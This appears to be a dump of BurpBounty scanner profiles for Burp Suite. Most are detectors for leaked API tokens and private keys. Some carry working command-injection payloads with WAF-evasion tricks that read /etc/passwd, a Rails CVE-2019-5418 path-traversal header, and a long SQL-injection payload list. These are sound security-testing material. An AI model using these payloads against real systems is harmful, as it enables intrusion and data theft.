"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Paypal_Braintree_access_token.bb | [
{
"ProfileName": "Paypal_Braintree_access_token",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@six2dez1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,access_token\\$production\\$[0-9a-z]{16}\\$[0-9a-f]{32}"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": true,
"ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
"HttpResponseCode": "",
"NegativeCT": true,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Paypal Braintree access token",
"IssueSeverity": "Information",
"IssueConfidence": "Certain",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Picatic_API_Key.bb | [
{
"ProfileName": "Picatic_API_Key",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@six2dez1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,sk_live_[0-9a-z]{32}"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": true,
"ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
"HttpResponseCode": "",
"NegativeCT": true,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Picatic API Key",
"IssueSeverity": "Information",
"IssueConfidence": "Certain",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Private_SSH_Key.bb | [
{
"ProfileName": "Private_SSH_Key",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@six2dez1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,([-]+BEGIN [^\\s]+ PRIVATE KEY[-])"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": true,
"ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
"HttpResponseCode": "",
"NegativeCT": true,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Private SSH Key",
"IssueSeverity": "Information",
"IssueConfidence": "Certain",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/RCE-linux-Based.bb | [
{
"ProfileName": "RCE-linux-Based",
"Name": "",
"Enabled": true,
"Scanner": 1,
"Author": "@Sy3Omda",
"Payloads": [
"true,;cat /e${hahaha}tc/${heywaf}pas${catchthis}swd",
"true,;cat$u /etc$u/passwd$u",
"true,;{cat,/etc/passwd}",
"true,;cat\u003c/etc/passwd",
"true,;/???/??t /???/??ss??",
"true,%0Acat%20/etc/passwd",
"true,;cat$IFS/etc/passwd",
"true,;echo${IFS}\"RCE\"${IFS}\u0026\u0026cat${IFS}/etc/passwd",
"true,;who$@ami",
"true,;w\\ho\\am\\i",
"true,;w\"h\"o\"am\"i",
"true,;w\u0027h\u0027o\u0027am\u0027i",
"true,a;id;",
"true,|/bin/ls -al",
"true,a;/usr/bin/id;"
],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,root:x",
"true,Or,www-data"
],
"Tags": [
"PathTraversal",
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 0,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 2,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "RCE-linux-Based",
"IssueSeverity": "High",
"IssueConfidence": "Certain",
"IssueDetail": "Path traversal payload: \u003cbr\u003e \u003cpayload\u003e",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [
18,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127
],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/RCE.bb | [
{
"ProfileName": "RCE",
"Name": "",
"Enabled": true,
"Scanner": 1,
"Author": "@egarme",
"Payloads": [
"true, || id",
"true, | id",
"true,; id",
"true, \u0026\u0026 id",
"true, \u0026 id"
],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,.*uid\u003d.*gid\u003d.*groups\u003d.*"
],
"Tags": [
"RCE",
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 0,
"RedirType": 4,
"MaxRedir": 4,
"payloadPosition": 2,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "RCE",
"IssueSeverity": "High",
"IssueConfidence": "Certain",
"IssueDetail": "RCE found",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [
18,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127
],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/RoR CVE-2019-5418 WAF Bypass.bb | [
{
"ProfileName": "RoR CVE-2019-5418 WAF Bypass",
"Name": "",
"Enabled": true,
"Scanner": 1,
"Author": "@egarme",
"Payloads": [
"true,/"
],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,root:x"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 0,
"RedirType": 4,
"MaxRedir": 3,
"payloadPosition": 1,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Ruby on Rails CVE-2019-5418",
"IssueSeverity": "High",
"IssueConfidence": "Certain",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [
{
"type": "Request",
"match": "Accept: .*",
"replace": "Accept: ../../../../../../../../e*c/p*ss*d{{",
"regex": "Regex"
}
],
"VariationAttributes": [],
"InsertionPointType": [
65
],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/RoR_CVE-2019-5418_WAF_Bypass.bb | [
{
"ProfileName": "RoR_CVE-2019-5418_WAF_Bypass",
"Name": "",
"Enabled": true,
"Scanner": 1,
"Author": "@egarme",
"Payloads": [
"true,/"
],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,root:x"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 0,
"RedirType": 4,
"MaxRedir": 3,
"payloadPosition": 1,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Ruby on Rails CVE-2019-5418",
"IssueSeverity": "High",
"IssueConfidence": "Certain",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [
{
"type": "Request",
"match": "Accept: .*",
"replace": "Accept: ../../../../../../../../e*c/p*ss*d{{",
"regex": "Regex"
}
],
"VariationAttributes": [],
"InsertionPointType": [
65
],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Ruby on Rails CVE-2019-5418.bb | [
{
"ProfileName": "Ruby on Rails CVE-2019-5418",
"Name": "",
"Enabled": true,
"Scanner": 1,
"Author": "@egarme",
"Payloads": [
"true,/"
],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,root:x"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 0,
"RedirType": 4,
"MaxRedir": 3,
"payloadPosition": 1,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Ruby on Rails CVE-2019-5418",
"IssueSeverity": "High",
"IssueConfidence": "Certain",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [
{
"type": "Request",
"match": "Accept: .*",
"replace": "Accept: ../../../../../../../../etc/passwd{{",
"regex": "Regex"
}
],
"VariationAttributes": [],
"InsertionPointType": [
18,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127
],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Ruby_on_Rails_CVE-2019-5418.bb | [
{
"ProfileName": "Ruby_on_Rails_CVE-2019-5418",
"Name": "",
"Enabled": true,
"Scanner": 1,
"Author": "@egarme",
"Payloads": [
"true,/"
],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,root:x"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 0,
"RedirType": 4,
"MaxRedir": 3,
"payloadPosition": 1,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Ruby on Rails CVE-2019-5418",
"IssueSeverity": "High",
"IssueConfidence": "Certain",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [
{
"type": "Request",
"match": "Accept: .*",
"replace": "Accept: ../../../../../../../../etc/passwd{{",
"regex": "Regex"
}
],
"VariationAttributes": [],
"InsertionPointType": [
18,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127
],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/SecurityHeaders.bb | [
{
"ProfileName": "SecurityHeaders",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@six2dez1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,Cache-Control",
"true,Or,X-Frame-Options",
"true,Or,X-Content-Type-Options:nosniff",
"true,Or,Strict-Transport-Security",
"true,Or,X-XSS-Protection",
"true,Or,Content-Security-Policy"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": true,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": true,
"IsContentType": true,
"ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2,application/javascript",
"HttpResponseCode": "",
"NegativeCT": true,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 1,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Missing Security Headers",
"IssueSeverity": "Low",
"IssueConfidence": "Certain",
"IssueDetail": "Missing security headers detected.",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/ServerBanner.bb | [
{
"ProfileName": "ServerBanner",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@egarme",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,Server:.*[0-9].*"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": true,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 1,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "ServerBanner",
"IssueSeverity": "Information",
"IssueConfidence": "Firm",
"IssueDetail": "Server banner found: \u003cbr\u003e\u003cgrep\u003e",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Software_Version_revealed.bb | [
{
"ProfileName": "Software_Version_revealed",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@six2dez1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,(0|[1-9]\\d*)\\.(0|[1-9]\\d*)\\.(0|[1-9]\\d*)(?:-((?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?",
"true,Or,(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)(?:-((?:0|[1-9][0-9]*|[0-9]*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9][0-9]*|[0-9]*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": true,
"ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
"HttpResponseCode": "",
"NegativeCT": true,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Software Version revealed",
"IssueSeverity": "Information",
"IssueConfidence": "Certain",
"IssueDetail": "Software Version revealed",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/SonarQube_API_Key_Docs.bb | [
{
"ProfileName": "SonarQube_API_Key_Docs",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@six2dez1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,(?i)sonar.{0,50}(\\\\\\\"|\u0027|`)?[0-9a-f]{40}(\\\\\\\"|\u0027|`)?"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": true,
"ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
"HttpResponseCode": "",
"NegativeCT": true,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "SonarQube Api Key Docs",
"IssueSeverity": "Information",
"IssueConfidence": "Certain",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/SQLi-Error-SQLmap.bb | [
{
"ProfileName": "SQLi-Error-SQLmap",
"Name": "",
"Enabled": true,
"Scanner": 1,
"Author": "@GochaOqradze",
"Payloads": [
"true,\u0027",
"true,\u0027\u0027",
"true,`",
"true,``",
"true,,",
"true,\"",
"true,\"\"",
"true,/",
"true,//",
"true,\\",
"true,\\\\",
"true,;",
"true,\u0027 or \"",
"true,-- or # ",
"true,\u0027 OR \u00271",
"true,\u0027 OR 1 -- -",
"true,\" OR \"\" \u003d \"",
"true,\" OR 1 \u003d 1 -- -",
"true,\u0027 OR \u0027\u0027 \u003d \u0027",
"true,\u0027\u003d\u0027",
"true,\u0027LIKE\u0027",
"true,\u0027\u003d0--+",
"true, OR 1\u003d1",
"true,\u0027 OR \u0027x\u0027\u003d\u0027x",
"true,\u0027 AND id IS NULL; --",
"true,\u0027\u0027\u0027\u0027\u0027\u0027\u0027\u0027\u0027\u0027\u0027\u0027\u0027UNION SELECT \u00272",
"true,%00",
"true,/*…*/ ",
"true,+",
"true,||",
"true,%",
"true,@variable",
"true,@@variable",
"true,#",
"true,AND 1",
"true,AND 0",
"true,AND true",
"true,AND false",
"true,1-false",
"true,1-true",
"true,1*56",
"true,-2",
"true,1\u0027 ORDER BY 1--+",
"true,1\u0027 ORDER BY 2--+",
"true,1\u0027 ORDER BY 3--+",
"true,1\u0027 ORDER BY 1,2--+",
"true,1\u0027 ORDER BY 1,2,3--+",
"true,1\u0027 GROUP BY 1,2,--+",
"true,1\u0027 GROUP BY 1,2,3--+",
"true,\u0027 GROUP BY columnnames having 1\u003d1 --",
"true,-1\u0027 UNION SELECT 1,2,3--+",
"true,\u0027 UNION SELECT sum(columnname ) from tablename --",
"true,-1 UNION SELECT 1 INTO @,@",
"true,-1 UNION SELECT 1 INTO @,@,@",
"true,1 AND (SELECT * FROM Users) \u003d 1",
"true,\u0027 AND MID(VERSION(),1,1) \u003d \u00275\u0027;",
"true,\u0027 and 1 in (select min(name) from sysobjects where xtype \u003d \u0027U\u0027 and name \u003e \u0027.\u0027) --",
"true,,(select * from (select(sleep(10)))a)",
"true,%2c(select%20*%20from%20(select(sleep(10)))a)",
"true,\u0027;WAITFOR DELAY \u00270:0:10\u0027--",
"true,#\t Hash comment",
"true,/*",
"true,-- -",
"true,;%00",
"true,`"
],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,Exception (condition )?\\d+\\. Transaction rollback",
"true,Or,com\\.frontbase\\.jdbc",
"true,Or,org\\.h2\\.jdbc",
"true,Or,Unexpected end of command in statement \\[\"",
"true,Or,Unexpected token.*?in statement \\[",
"true,Or,org\\.hsqldb\\.jdbc",
"true,Or,CLI Driver.*?DB2",
"true,Or,DB2 SQL error",
"true,Or,\\bdb2_\\w+\\(",
"true,Or,SQLSTATE.+SQLCODE",
"true,Or,com\\.ibm\\.db2\\.jcc",
"true,Or,Zend_Db_(Adapter|Statement)_Db2_Exception",
"true,Or,Pdo[./_\\\\]Ibm",
"true,Or,DB2Exception",
"true,Or,Warning.*?\\Wifx_",
"true,Or,Exception.*?Informix",
"true,Or,Informix ODBC Driver",
"true,Or,ODBC Informix driver",
"true,Or,com\\.informix\\.jdbc",
"true,Or,weblogic\\.jdbc\\.informix",
"true,Or,Pdo[./_\\\\]Informix",
"true,Or,IfxException",
"true,Or,Warning.*?\\Wingres_",
"true,Or,Ingres SQLSTATE",
"true,Or,Ingres\\W.*?Driver",
"true,Or,com\\.ingres\\.gcf\\.jdbc",
"true,Or,Dynamic SQL Error",
"true,Or,Warning.*?\\Wibase_",
"true,Or,org\\.firebirdsql\\.jdbc",
"true,Or,Pdo[./_\\\\]Firebird",
"true,Or,Microsoft Access (\\d+ )?Driver",
"true,Or,JET Database Engine",
"true,Or,Access Database Engine",
"true,Or,ODBC Microsoft Access",
"true,Or,Syntax error \\(missing operator\\) in query expression",
"true,Or,Driver.*? SQL[\\-\\_\\ ]*Server",
"true,Or,OLE DB.*? SQL Server",
"true,Or,\\bSQL Server[^\u0026lt;\u0026quot;]+Driver",
"true,Or,Warning.*?\\W(mssql|sqlsrv)_",
"true,Or,\\bSQL Server[^\u0026lt;\u0026quot;]+[0-9a-fA-F]{8}",
"true,Or,System\\.Data\\.SqlClient\\.SqlException",
"true,Or,(?s)Exception.*?\\bRoadhouse\\.Cms\\.",
"true,Or,Microsoft SQL Native Client error \u0027[0-9a-fA-F]{8}",
"true,Or,\\[SQL Server\\]",
"true,Or,ODBC SQL Server Driver",
"true,Or,ODBC Driver \\d+ for SQL Server",
"true,Or,SQLServer JDBC Driver",
"true,Or,com\\.jnetdirect\\.jsql",
"true,Or,macromedia\\.jdbc\\.sqlserver",
"true,Or,Zend_Db_(Adapter|Statement)_Sqlsrv_Exception",
"true,Or,com\\.microsoft\\.sqlserver\\.jdbc",
"true,Or,Pdo[./_\\\\](Mssql|SqlSrv)",
"true,Or,SQL(Srv|Server)Exception",
"true,Or,SQL syntax.*?MySQL",
"true,Or,Warning.*?\\Wmysqli?_",
"true,Or,MySQLSyntaxErrorException",
"true,Or,valid MySQL result",
"true,Or,check the manual that corresponds to your (MySQL|MariaDB) server version",
"true,Or,Unknown column \u0027[^ ]+\u0027 in \u0027field list\u0027",
"true,Or,MySqlClient\\.",
"true,Or,com\\.mysql\\.jdbc",
"true,Or,Zend_Db_(Adapter|Statement)_Mysqli_Exception",
"true,Or,Pdo[./_\\\\]Mysql",
"true,Or,MySqlException",
"true,Or,\\bORA-\\d{5}",
"true,Or,Oracle error",
"true,Or,Oracle.*?Driver",
"true,Or,Warning.*?\\W(oci|ora)_",
"true,Or,quoted string not properly terminated",
"true,Or,SQL command not properly ended",
"true,Or,macromedia\\.jdbc\\.oracle",
"true,Or,oracle\\.jdbc",
"true,Or,Zend_Db_(Adapter|Statement)_Oracle_Exception",
"true,Or,Pdo[./_\\\\](Oracle|OCI)",
"true,Or,OracleException",
"true,Or,PostgreSQL.*?ERROR",
"true,Or,Warning.*?\\Wpg_",
"true,Or,valid PostgreSQL result",
"true,Or,Npgsql\\.",
"true,Or,PG::SyntaxError:",
"true,Or,org\\.postgresql\\.util\\.PSQLException",
"true,Or,ERROR:\\s\\ssyntax error at or near",
"true,Or,ERROR: parser: parse error at or near",
"true,Or,PostgreSQL query failed",
"true,Or,org\\.postgresql\\.jdbc",
"true,Or,Pdo[./_\\\\]Pgsql",
"true,Or,PSQLException",
"true,Or,SQL error.*?POS([0-9]+)",
"true,Or,Warning.*?\\Wmaxdb_",
"true,Or,DriverSapDB",
"true,Or,com\\.sap\\.dbtech\\.jdbc",
"true,Or,SQLite/JDBCDriver",
"true,Or,SQLite\\.Exception",
"true,Or,(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException",
"true,Or,Warning.*?\\W(sqlite_|SQLite3::)",
"true,Or,\\[SQLITE_ERROR\\]",
"true,Or,SQLite error \\d+:",
"true,Or,sqlite3.OperationalError:",
"true,Or,SQLite3::SQLException",
"true,Or,org\\.sqlite\\.JDBC",
"true,Or,Pdo[./_\\\\]Sqlite",
"true,Or,SQLiteException",
"true,Or,Warning.*?\\Wsybase_",
"true,Or,Sybase message",
"true,Or,Sybase.*?Server message",
"true,Or,SybSQLException",
"true,Or,Sybase\\.Data\\.AseClient",
"true,Or,com\\.sybase\\.jdbc"
],
"Tags": [
"SQLi",
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 0,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 2,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "SQLi-Error-SQLmap",
"IssueSeverity": "High",
"IssueConfidence": "Certain",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [
65,
32,
36,
1,
2,
6,
5,
64,
0,
3,
4
],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/SQL_Message_Detected.bb | [
{
"ProfileName": "SQL_Message_Detected",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@six2dez1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
